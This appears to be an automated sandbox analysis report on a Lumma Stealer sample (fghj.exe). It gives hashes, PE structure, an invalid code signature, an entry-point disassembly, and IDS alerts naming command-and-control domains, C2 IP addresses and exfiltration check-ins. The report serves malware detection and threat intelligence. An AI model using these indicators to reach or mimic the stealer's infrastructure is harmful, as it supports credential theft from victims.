                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  No created / dropped files found

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Entropy (8bit):7.990793025451319
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:fghj.exe
                                                                                                                                                                                                                  File size:3'206'904 bytes
                                                                                                                                                                                                                  MD5:549e550f48b48de65c69c4e87bffaa00
                                                                                                                                                                                                                  SHA1:ff5914ba3411ba52049f9cec0b7c5267d2f7015a
                                                                                                                                                                                                                  SHA256:b4129afa37522ee77ca932eb2f29c16df3ad47dc6cc52864ef488fbb537296e2
                                                                                                                                                                                                                  SHA512:de2a949ae9ce6f6b80cccea0ae0b7ebd997df54cfc697285c52220ee42d7294d8b9202bc7edece9241b8b6bf7215365608bc704d2cfe636dd528eb2d03320586
                                                                                                                                                                                                                  SSDEEP:98304:R5tGWuHhHh+oGqWy9zLyj3y5Jmpb3wUgzE:R5UWAhlGqpJyjxpbAUgw
                                                                                                                                                                                                                  TLSH:FAE5332A7BAD1C72E9F65734087B636229793CA06C30D32E47C8324B15742AA77B4377
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................|.......................|.......{.......l.......o.......i.....Rich....................PE..L.....dM...........

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:2dccfae9acf6aaac

                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Entrypoint:0x404503
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                  Time Stamp:0x4D648ED3 [Wed Feb 23 04:36:35 2011 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:2bdb3f8e4a236153c327872fbf3556d1

                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA EV E36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                  • 05/09/2024 01:00:00 06/09/2027 00:59:59
                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                  • CN=High-Logic B.V., O=High-Logic B.V., S=Utrecht, C=NL, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=NL, SERIALNUMBER=30191723
                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                  Thumbprint MD5:CF18677A5AEC7B0EA667E91F6EB4F4A9
                                                                                                                                                                                                                  Thumbprint SHA-1:ABA791A2DEDD3B5527EE8B6E6575D1082C3BBAB6
                                                                                                                                                                                                                  Thumbprint SHA-256:A2023798B729B419180B82177D2DDCA9F4DCB7635EA0E25A3F8861E6002142E1
                                                                                                                                                                                                                  Serial:00B4BB55D5D63E8E7A2C388E74EEAFEDC5

                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  call 00007F16247B3F29h
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  push dword ptr [esp+04h]
                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                  call dword ptr [0040C034h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  call dword ptr [0040C030h]
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push dword ptr [esp+04h]
                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                  call dword ptr [0040C034h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  call dword ptr [0040C038h]
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  cmp dword ptr [ebp+10h], 00000000h
                                                                                                                                                                                                                  mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                  je 00007F16247B4256h
                                                                                                                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                  mov dl, byte ptr [eax]
                                                                                                                                                                                                                  dec dword ptr [ebp+10h]
                                                                                                                                                                                                                  mov byte ptr [ecx+eax], dl
                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                  cmp dword ptr [ebp+10h], 00000000h
                                                                                                                                                                                                                  jne 00007F16247B4233h
                                                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  jmp 00007F16247B421Bh
                                                                                                                                                                                                                  mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                  test ecx, ecx
                                                                                                                                                                                                                  jbe 00007F16247B4265h
                                                                                                                                                                                                                  mov al, byte ptr [esp+08h]
                                                                                                                                                                                                                  movzx eax, al
                                                                                                                                                                                                                  imul eax, eax, 01010101h
                                                                                                                                                                                                                  mov edx, ecx
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                                                                  shr ecx, 02h
                                                                                                                                                                                                                  rep stosd
                                                                                                                                                                                                                  mov ecx, edx
                                                                                                                                                                                                                  and ecx, 03h
                                                                                                                                                                                                                  rep stosb
                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                  mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  fld dword ptr [esp+08h]
                                                                                                                                                                                                                  fistp dword ptr [esp]
                                                                                                                                                                                                                  mov eax, dword ptr [esp]
                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  lea eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                  push dword ptr [ebp+14h]
                                                                                                                                                                                                                  mov dword ptr [ebp-08h], 00000004h
                                                                                                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                  call dword ptr [eax+18h]
                                                                                                                                                                                                                  dec eax

                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd7380x28.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x2aebe9.rsrc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x30cc000x22f8.reloc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2be0000x788.reloc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xc0d00x1c.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xc0000xc4.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xd14c0xa0.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                  .text0x10000xa0670xa200f8cafe4e5965b03a55b286fd64196879False0.6324508101851852DOS executable (COM)6.648500706356357IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .rdata0xc0000x1b850x1c00b82428688c5f4f06f5cab197a37e821dFalse0.4859095982142857data5.066779214622968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .data0xe0000x11c0x200caf956c799a760ea86245ed9368e7babFalse0.3125firmware 7cad v4000 (revision 1923956736) D\317@ \302\255@, version 41900.16384.39340 (region 1756184576), 464338944 bytes or less, UNKNOWN1 0x68ad4000, UNKNOWN2 0xcbac4000, UNKNOWN3 0xfdac4000, at 0x25ad4000 799883264 bytes , at 0x39ad4000 1135427584 bytes , at 0xb7ac4000 2913746944 bytes2.288504814976975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .rsrc0xf0000x2aebe90x2aec00840bfc4c49162cb76abecad83cb7b65eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .reloc0x2be0000x51c000x51c0027cde34e4fa2c1189472cd3692a9ef3cFalse0.9818096569189603data7.998453986481548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                  IMG0xfa180x507Targa image data - RGB - RLE 13 x 33 x 24EnglishUnited States0.5532245532245532
                                                                                                                                                                                                                  TYPELIB0xff200x203cdataEnglishUnited States0.428744546776539
                                                                                                                                                                                                                  RT_ICON0x11f5c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishCanada0.3683368869936034
                                                                                                                                                                                                                  RT_ICON0x12e040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishCanada0.4855595667870036
                                                                                                                                                                                                                  RT_ICON0x136ac0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishCanada0.38078034682080925
                                                                                                                                                                                                                  RT_ICON0x13c140x3f10PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishCanada0.9837710604558969
                                                                                                                                                                                                                  RT_ICON0x17b240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishCanada0.27759336099585064
                                                                                                                                                                                                                  RT_ICON0x1a0cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishCanada0.4017354596622889
                                                                                                                                                                                                                  RT_ICON0x1b1740x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishCanada0.6161347517730497
                                                                                                                                                                                                                  RT_STRING0x1b5dc0x26data0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b6040x26dataChineseTaiwan0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b62c0x26dataCzechCzech Republic0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b6540x26dataGermanGermany0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b67c0x26dataEnglishUnited States0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b6a40x26dataFrenchFrance0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b6cc0x26dataItalianItaly0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b6f40x26dataJapaneseJapan0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b71c0x26dataKoreanNorth Korea0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b71c0x26dataKoreanSouth Korea0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b7440x26dataDutchNetherlands0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b76c0x26dataPolishPoland0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b7940x26dataPortugueseBrazil0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b7bc0x26dataRussianRussia0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b7e40x26dataTurkishTurkey0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b80c0x26dataChineseChina0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b8340x26data0.47368421052631576
                                                                                                                                                                                                                  RT_STRING0x1b85c0x86data0.6865671641791045
                                                                                                                                                                                                                  RT_STRING0x1b8e40x5edataChineseTaiwan0.7021276595744681
                                                                                                                                                                                                                  RT_STRING0x1b9440x90dataCzechCzech Republic0.6875
                                                                                                                                                                                                                  RT_STRING0x1b9d40x88dataGermanGermany0.6691176470588235
                                                                                                                                                                                                                  RT_STRING0x1ba5c0x68dataEnglishUnited States0.6634615384615384
                                                                                                                                                                                                                  RT_STRING0x1bac40x8adataFrenchFrance0.6521739130434783
                                                                                                                                                                                                                  RT_STRING0x1bb500x90dataItalianItaly0.6458333333333334
                                                                                                                                                                                                                  RT_STRING0x1bbe00x64dataJapaneseJapan0.71
                                                                                                                                                                                                                  RT_STRING0x1bc440x62dataKoreanNorth Korea0.7142857142857143
                                                                                                                                                                                                                  RT_STRING0x1bc440x62dataKoreanSouth Korea0.7142857142857143
                                                                                                                                                                                                                  RT_STRING0x1bca80x86dataDutchNetherlands0.6791044776119403
                                                                                                                                                                                                                  RT_STRING0x1bd300x7cdataPolishPoland0.6693548387096774
                                                                                                                                                                                                                  RT_STRING0x1bdac0x70dataPortugueseBrazil0.6339285714285714
                                                                                                                                                                                                                  RT_STRING0x1be1c0x7cdataRussianRussia0.717741935483871
                                                                                                                                                                                                                  RT_STRING0x1be980x6cdataTurkishTurkey0.6851851851851852
                                                                                                                                                                                                                  RT_STRING0x1bf040x5edataChineseChina0.7021276595744681
                                                                                                                                                                                                                  RT_STRING0x1bf640x88data0.6617647058823529
                                                                                                                                                                                                                  RT_STRING0x1bfec0x288Matlab v4 mat-file (little endian) k, numeric, rows 0, columns 00.39969135802469136
                                                                                                                                                                                                                  RT_STRING0x1c2740xd0Matlab v4 mat-file (little endian) \335\210\013z\017_, numeric, rows 0, columns 0ChineseTaiwan0.7836538461538461
                                                                                                                                                                                                                  RT_STRING0x1c3440x25eMatlab v4 mat-file (little endian) n, numeric, rows 0, columns 0CzechCzech Republic0.45874587458745875
                                                                                                                                                                                                                  RT_STRING0x1c5a40x33cMatlab v4 mat-file (little endian) e, numeric, rows 0, columns 0GermanGermany0.38164251207729466
                                                                                                                                                                                                                  RT_STRING0x1c8e00x254Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0EnglishUnited States0.4110738255033557
                                                                                                                                                                                                                  RT_STRING0x1cb340x2f6Matlab v4 mat-file (little endian) r, numeric, rows 0, columns 0FrenchFrance0.39841688654353563
                                                                                                                                                                                                                  RT_STRING0x1ce2c0x2e6Matlab v4 mat-file (little endian) r, numeric, rows 0, columns 0ItalianItaly0.3665768194070081
                                                                                                                                                                                                                  RT_STRING0x1d1140x160Matlab v4 mat-file (little endian) \3630\2710\3100\3740\3510\3740L04x, numeric, rows 0, columns 0JapaneseJapan0.65625
                                                                                                                                                                                                                  RT_STRING0x1d2740x160Matlab v4 mat-file (little endian) X\316 , numeric, rows 0, columns 0KoreanNorth Korea0.6846590909090909
                                                                                                                                                                                                                  RT_STRING0x1d2740x160Matlab v4 mat-file (little endian) X\316 , numeric, rows 0, columns 0KoreanSouth Korea0.6846590909090909
                                                                                                                                                                                                                  RT_STRING0x1d3d40x2a0Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0DutchNetherlands0.4226190476190476
                                                                                                                                                                                                                  RT_STRING0x1d6740x23aMatlab v4 mat-file (little endian) n, numeric, rows 0, columns 0PolishPoland0.4421052631578947
                                                                                                                                                                                                                  RT_STRING0x1d8b00x226Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0PortugueseBrazil0.42727272727272725
                                                                                                                                                                                                                  RT_STRING0x1dad80x274Matlab v4 mat-file (little endian) @\004>\0043\004@\0040\004<\004<\0040\004 , numeric, rows 0, columns 0RussianRussia0.43630573248407645
                                                                                                                                                                                                                  RT_STRING0x1dd4c0x20aMatlab v4 mat-file (little endian) \374, numeric, rows 0, columns 0TurkishTurkey0.4521072796934866
                                                                                                                                                                                                                  RT_STRING0x1df580xd4Matlab v4 mat-file (little endian) \305\210\013z\217^\362]_cOW\0020\367\213\315\221\260e\013N}\217\0020, numeric, rows 0, columns 0ChineseChina0.7735849056603774
                                                                                                                                                                                                                  RT_STRING0x1e02c0x29cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 00.3787425149700599
                                                                                                                                                                                                                  RT_STRING0x1e2c80x38data0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3000x38dataChineseTaiwan0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3380x38dataCzechCzech Republic0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3700x38dataGermanGermany0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3a80x38dataEnglishUnited States0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3e00x38dataFrenchFrance0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4180x38dataItalianItaly0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4500x38dataJapaneseJapan0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4880x38dataKoreanNorth Korea0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4880x38dataKoreanSouth Korea0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4c00x38dataDutchNetherlands0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4f80x38dataPolishPoland0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5300x38dataPortugueseBrazil0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5680x38dataRussianRussia0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5a00x3adataTurkishTurkey0.6551724137931034
                                                                                                                                                                                                                  RT_STRING0x1e5dc0x38dataChineseChina0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e6140x38data0.6428571428571429
                                                                                                                                                                                                                  RT_RCDATA0x1e64c0x2a54edata1.0003518080627487
                                                                                                                                                                                                                  RT_RCDATA0x48b9c0x273b20data1.0003108978271484
                                                                                                                                                                                                                  RT_RCDATA0x2bc6bc0xf31data1.002828490614554
                                                                                                                                                                                                                  RT_GROUP_ICON0x2bd5f00x68dataEnglishCanada0.6730769230769231
                                                                                                                                                                                                                  RT_VERSION0x2bd6580x414dataEnglishUnited States0.3955938697318008
                                                                                                                                                                                                                  RT_MANIFEST0x2bda6c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                  KERNEL32.dllGetLastError, CreateMutexW, CloseHandle, ExitProcess, GetEnvironmentVariableW, LocalFree, LocalAlloc, GetCurrentProcess, GetVersionExA, SetThreadLocale, GetCommandLineW, GetModuleHandleW, HeapAlloc, GetProcessHeap, HeapFree, ReleaseMutex, WaitForSingleObject, QueueUserAPC, SetWaitableTimer, ExitThread, CreateWaitableTimerW, CreateThread, FindResourceW, CreateDirectoryW, ReadFile, GetFileSize, CreateFileW, WriteFile, GetTempFileNameW, GetTempPathW, RemoveDirectoryW, DeleteFileW, FreeLibrary, FreeResource, LockResource, SizeofResource, LoadResource, LoadLibraryW, SetFilePointer, GetProcAddress, GetSystemDirectoryW, GetSystemTime, FindResourceA, OutputDebugStringW, LoadLibraryA, GetThreadLocale, InterlockedExchange, RaiseException

                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                  EnglishCanada
                                                                                                                                                                                                                  ChineseTaiwan
                                                                                                                                                                                                                  CzechCzech Republic
                                                                                                                                                                                                                  GermanGermany
                                                                                                                                                                                                                  FrenchFrance
                                                                                                                                                                                                                  ItalianItaly
                                                                                                                                                                                                                  JapaneseJapan
                                                                                                                                                                                                                  KoreanNorth Korea
                                                                                                                                                                                                                  KoreanSouth Korea
                                                                                                                                                                                                                  DutchNetherlands
                                                                                                                                                                                                                  PolishPoland
                                                                                                                                                                                                                  PortugueseBrazil
                                                                                                                                                                                                                  RussianRussia
                                                                                                                                                                                                                  TurkishTurkey
                                                                                                                                                                                                                  ChineseChina

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                  2025-01-10T11:47:48.139606+01002058285ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz)1192.168.2.9545541.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.152069+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.9523851.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.166347+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.9528571.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.180277+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.9590471.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.191793+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.9626571.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.202767+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.9547891.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.218852+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.9548261.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.229945+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.9534731.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.240914+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.9599991.1.1.153UDP
                                                                                                                                                                                                                  2025-01-10T11:47:48.921641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949815104.102.49.254443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:49.440994+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.949815104.102.49.254443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:50.086323+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949826104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:50.524034+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949826104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:50.524034+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949826104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:51.162537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949832104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:51.650332+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949832104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:51.650332+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949832104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:52.739731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949844104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:53.982728+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949850104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:55.356824+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949861104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:56.746110+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949872104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:57.480901+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949872104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:58.052478+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949878104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:59.062810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949889104.21.96.1443TCP
                                                                                                                                                                                                                  2025-01-10T11:47:59.546802+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949889104.21.96.1443TCP

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.263353109 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.263390064 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.263479948 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.287075043 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.287090063 CET44349815104.102.49.254192.168.2.9
